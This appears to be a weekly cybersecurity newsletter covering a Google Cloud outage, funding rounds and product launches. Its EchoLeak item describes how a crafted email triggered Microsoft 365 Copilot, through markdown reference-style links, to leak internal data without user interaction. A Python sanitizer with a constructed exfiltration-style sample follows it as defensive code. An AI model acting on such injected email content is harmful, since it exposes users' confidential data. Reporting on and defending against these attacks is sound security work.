TCP #91: When Everything Decides to Break at Once
Major cloud outage, zero-click AI vulns, AI agents taking over, product innovation, and $1.4B+ in funding news
Welcome to The Cybersecurity Pulse (TCP)! I'm Darwin Salazar, GTM lead at Monad and former detection engineer at DataDog. Each week, I bring you the latest security product innovation and industry news.
Are You Patching KEVs That Can't Actually Hurt You?
OX’s latest research reveals why blindly patching every KEV is a waste of time — and what to do instead.
What’s up! 👋🏽 What a couple of weeks it's been. I took last week off to focus on our OCSF launch at Monad, so this week's TCP will be jam-packed. Here's a quick recap for those who have lost track:
🚷 Google breaks half the internet including Cursor, Anthropic, Cloudflare, Spotify, and more.
🪲 Zero-click vuln found in Microsoft 365 Copilot and a vuln in Asana's MCP server.
⚖️ OWASP announces AI Vulnerability Scoring System (AIVSS) effort.
🕵️ Maze raises $25M to fix cloud vuln management with AI agents.
👁️ Varonis launches UEBA and prompt monitoring for ChatGPT Enterprise.
Elon and Trump have a public spat, then make up.
Protests + riots
World on the brink of World War III
In all seriousness, it's a fairly intense time in human history. For my readers and friends in Israel, Iran and everywhere in between, I'm praying for your safety and a ceasefire soon.
That said, let’s cyber.
⚒️ Picks of the Week ⚒️
Aim Security discovers EchoLeak, Zero-Click Vulnerability in Microsoft Copilot
Aim Security's research team recently found a vuln in Microsoft 365 Copilot that allowed data to be exfiltrated without any user interaction. To exploit the vuln, all an attacker had to do was craft a specially formatted email designed to bypass security filters and trigger Copilot (using markdown reference-style linking) to unknowingly embed sensitive internal data in its response.
While Aim followed responsible disclosure practices and Microsoft has since patched the vuln, EchoLeak sends a stark reminder to our industry:
AI is expanding our attack surface and introducing new vulnerability classes. In other words, AI is introducing unknown unknowns due to its complexity and how deeply integrated it's becoming. It's very difficult to threat model or plan for what you don't know, which is why most security leaders prefer to isolate AI workloads and host them in controlled on-prem environments. Unknown unknowns are the scariest of all vuln classes.
Kudos to the Aim team for the great research!
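For defenders, here is one way to check an assistant's response before it is rendered. It is an added example, not code from Aim Security or Microsoft. It resolves markdown reference-style links and images and strips any that point outside an allowlist. The host names, the sample response and the function names are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Constructed allowlist: hosts a rendered response may reference.
ALLOWED_HOSTS = {"intranet.example"}

# Definition line:  [label]: <url> "optional title"
REF_DEF = re.compile(r'^ {0,3}\[([^\]]+)\]:[ \t]*<?(\S+?)>?(?:[ \t]+.*)?$', re.M)
# Use site: [text][label] or ![alt][label]; an empty label reuses the text.
REF_USE = re.compile(r'(!?)\[([^\]]*)\]\[([^\]]*)\]')

# Constructed model response mixing an allowed and two external references.
SAMPLE = (
    "Summary attached. See [the report][r1] and ![status][r2].\n"
    "Internal copy: [wiki][r3]\n\n"
    "[r1]: https://untrusted.example/c?d=Q3-forecast\n"
    "[r2]: https://untrusted.example/p.png?d=Q3-forecast\n"
    "[r3]: https://intranet.example/sites/fin\n"
)


def _norm(label):
    # Reference labels match case-insensitively with collapsed whitespace.
    return " ".join(label.lower().split())


def host_allowed(url):
    parts = urlsplit(url)
    return parts.scheme == "https" and (parts.hostname or "") in ALLOWED_HOSTS


def sanitize(markdown):
    """Return (clean_markdown, blocked_urls) for one model response."""
    defs = {_norm(m.group(1)): m.group(2) for m in REF_DEF.finditer(markdown)}
    blocked = sorted({u for u in defs.values() if not host_allowed(u)})

    def rewrite_use(m):
        bang, text, label = m.groups()
        url = defs.get(_norm(label or text))
        if url is None or host_allowed(url):
            return m.group(0)
        # An image is fetched on render with no click, so drop it entirely;
        # a link is reduced to its visible text.
        return "[image removed]" if bang else text

    clean = REF_USE.sub(rewrite_use, markdown)
    # Remove the definitions themselves so the URLs never reach the renderer.
    clean = REF_DEF.sub(lambda m: m.group(0) if host_allowed(m.group(2)) else "", clean)
    return clean, blocked
```

The `blocked` list is worth logging: a response that tries to reference an external host is a useful detection signal on its own.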
Spying on North Korean hackers in real-time: an npm malware saga
At 1 p.m., our malware analysis engine alerted us to a potential malicious package that had been added to NPM. The first indications suggested this would be a clear-cut case; however, when we started peeling back the layers, things weren’t quite as they seemed…
Here is a story about how sophisticated nation-state actors can hide malware within packages.
On June 4th, a bug was found in Asana's MCP server which could have exposed sensitive data (i.e., projects + task details) from one Asana org to another. There is no evidence of exploitation, and Asana has since issued a patch. While MCPs are all the hype and unlock a ton of biz value, they should go through the same rigorous security testing, monitoring, and governance as all other critical systems.
OWASP Top 10 Kicks Off the AI Vulnerability Scoring System (AIVSS) Project
I know what you're thinking: "Do we really need another vulnerability scoring system?" In my opinion, we don't. CVSS scoring is wide enough to cover AI vulns, and this is validated by the fact that AIVSS heavily relies on CVSS for its demo calculator.
However, OWASP does state that the new scoring system is meant to address demands that specifically cover vulns inherent in the technologies underlying AI agents + building a future-proof system + fostering knowledge sharing across the AI security community. We'll see what comes from this, but I do think that our industry is tired of dealing with the continuously expanding scope of scoring systems, compliance frameworks, Top 10s, etc. What shall we call this? "Framework bloat"?
Things got weird last Thursday afternoon when consumer and enterprise apps used by hundreds of millions of people started erroring out. The root cause was a null pointer bug that caused Google Cloud's Service Control service binary to crash. This brought down many of Google and Google Cloud's major services, including Gmail, Docs, Cloud Shell, and their IAM service. It also caused an outage for Anthropic, Discord, Spotify, and even Cloudflare. The Cloudflare outage in turn took down even more third-party services, given how many orgs use Cloudflare as their CDN and for traditional cloud services.
Luckily Google's SRE team had a fix out within an hour, but I think this was a wake-up call for many. Are you prepared for when your cloud provider and CDN go down?
Maze Banks $25M to Tackle Cloud Security With AI Agents
Maze is one of those startups that flips traditional security approaches on its head. In my opinion, they've simultaneously ushered in a new wave of what vulnerability management should look like moving forward and a playbook of how AI agents should be leveraged for security.
The solution ingests cloud vulns from tools (i.e., Wiz, CrowdStrike) and then has AI agents perform investigations directly in the customer's cloud environment to determine what's exploitable, how likely exploitation is, and the attack paths, and then either a) auto-remediate or b) propose a remediation plan.
Many large enterprises, especially those in the Fortune 500, have vulnerability backlogs of 100K+ findings. Deploying agents in a careful manner is a great way to find the needle in the haystack that will actually get you popped.
Maze recently raised a $25M Series A from Theory Ventures, Cherry Ventures and Tapestry VC. Kudos to the Maze team (and their website designers)! 🦾
🔮 The Future of Security 🔮
AI Security
Wiz and CrowdStrike each deepen partnership with NVIDIA
Wiz and CrowdStrike have both expanded their cloud security capabilities to cover NVIDIA's LLM NIM (prebuilt inferencing microservices) and NeMo (AI tool building platform).
This is a net win for both customer bases and their channel partners + really great to see NVIDIA continuing to invest in security.
Dig Deeper:
CrowdStrike and Nvidia Add LLM Security, Offer New Service for MSSPs
Wiz Integrates with NVIDIA Enterprise AI Factory Validated Design
Application Security
Ghost Security's self-serve is live!
My friends at Ghost are tackling the SAST and DAST space with AI agents and have built an amazing solution that is now self-serve, free of charge!
There's nothing I love more than a self-serve product trial. Users, and specifically engineers, do not want to sit through long sales cycles or talk with someone to see a demo. Of course, GTM teams have to balance that with proper filters and guardrails to encourage paid conversion.
Cloud Security
Tamnoon Launches Managed CDR and AI Agent for Cloud Security
Tamnoon has launched Managed Cloud Detection and Response (MCDR) and an AI agent to help with cloud security remediation. Since Day 1, Tamnoon has always placed a distinct focus on remediation (a true PITA) and it's great to see their product continue to evolve.
Data Security
Varonis launches data security monitoring for ChatGPT Enterprise
Varonis now provides extensive real-time monitoring and detection to alert when employees upload sensitive data to ChatGPT. The solution combines real-time scanning of AI conversations, behavioral threat detection, and complete audit trails to prevent accidental data exposure.
Cyera raises $540M at $6B valuation 💰
Cyera, one of the fastest-growing security startups in history, has raised a $540M Series E round led by Georgian, Greenoaks and Lightspeed Venture Partners. This funding comes ~six months after the company raised $300 million. Existing investors Accel, Coatue, Cyberstarts, Redpoint, Sapphire Ventures, Sequoia Capital and Spark Capital also participated in the round.
Governance, Risk, and Compliance (GRC)
Vanta launches AI Agent to automate compliance workflows
Vanta launches AI agent to streamline compliance.
Identity and Access Management
SpecterOps Privilege Zones enables security teams to define logical access boundaries
SpecterOps launches "Privilege Zones" for BloodHound Enterprise. The feature basically lets teams define custom security zones and then uses BloodHound's attack path analysis to detect when identities violate those boundaries across hybrid Microsoft/Azure environments. Enforceable privilege zones are pretty cool.
More IAM Security news ⬇️
Veza tackles AI credential surge with new nonhuman identity protections
Grip Security Launches ITDR 2.0 to Strengthen SaaS Identity Protection
Offensive Security
Horizon3.ai Raises $100 Million in Series D Funding
Title says it all. Total funding at $178.5M. Series D round led by NEA, 9Yards, Craft Ventures and SignalFire. Horizon3's execution and platform evolution have been great to witness.
Security Operations
Monad launches pre-built OCSF templates
Field-level manual mapping to OCSF is tedious + time-consuming, so we've recently launched pre-built OCSF templates to make SecOps teams' lives easier. You can take Monad for a spin with our self-serve tier here.
Here's the announcement post if you'd like to dig deeper.
Please reach out if you have any questions or feedback!
More SecOps news ⬇️
AWS CIRT announces the launch of the Threat Technique Catalog for AWS
Swimlane Secures $45M to Scale Security Automation and Channel Growth
Cymulate streamlines threat detection with AI-powered detection engineering assistant
Venture Land 🌇
After a string of successes, early-stage fund Felicis raises fresh $900M
Felicis Ventures is one of the top-performing VCs in security over the past 5 years, with big winners like Tines, Semgrep, and ConductorOne. They've recently raised $900M of fresh powder and it'll be fun to see what bets and investments they make moving forward.
Interested in sponsoring TCP?
Sponsoring TCP not only helps me continue to bring you the latest in security innovation, but it also connects you to a dedicated audience of ~6,000 CISOs, practitioners, founders, and investors across 100+ countries 🌎
Bye for now 👋🏽
That’s all for this week… See you next week!
Disclaimer
The insights, opinions, and analyses shared in The Cybersecurity Pulse are my own and do not represent the views or positions of my employer or any affiliated organizations. This newsletter is for informational purposes only and should not be construed as financial, legal, security, or investment advice.